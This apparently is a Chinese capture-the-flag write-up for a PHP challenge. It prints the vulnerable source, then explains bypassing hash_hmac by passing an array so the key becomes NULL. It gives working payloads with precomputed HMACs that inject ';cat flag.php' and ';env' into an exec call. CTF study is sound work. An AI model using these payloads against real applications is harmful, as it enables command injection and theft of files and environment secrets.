前言
关键字:[hash_hmac|黑猫警长]
题解
还以为提示会放在音频里。
结果听完了,真就黑猫警长??
把mp3下载下来,里面放了源码
<?php
if (empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])) {
die();
}
$clandestine = getenv("clandestine");
if (isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if ($hh !== $_POST['Black-Cat-Sheriff']) {
die();
}
echo exec("nc" . $_POST['One-ear'])hash_hmac漏洞
hash_hmac($algo, $data, $key)
当$data为数组,返回值是NULL
<?php
var_dump(hash_hmac('sha256', array(0), 'Unknown_key'));
扫目录扫出flag.php,所以读取flag.php
第一次hash_hmac的值是NULL,那第二次结果就可知了。
<?php
$clandestine = hash_hmac('sha256', array(), 123);
$hh = hash_hmac('sha256', ';cat flag.php', $clandestine);
echo $hh;04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6payload:
White-cat-monitor[]=K1ose&Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat flag.php
flag虽然打出来了,但提交到buu是错的,也不符合buu平时flag的格式。
搜了下原来得读取env。
White-cat-monitor[]=1&Black-Cat-Sheriff=afd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791b&One-ear=;env![刷题笔记:[PwnThyBytes 2019]Baby_SQL](/medias/featureimages/46.jpg)
![刷题笔记:[CISCN2021 Quals]upload](/medias/featureimages/12.jpg)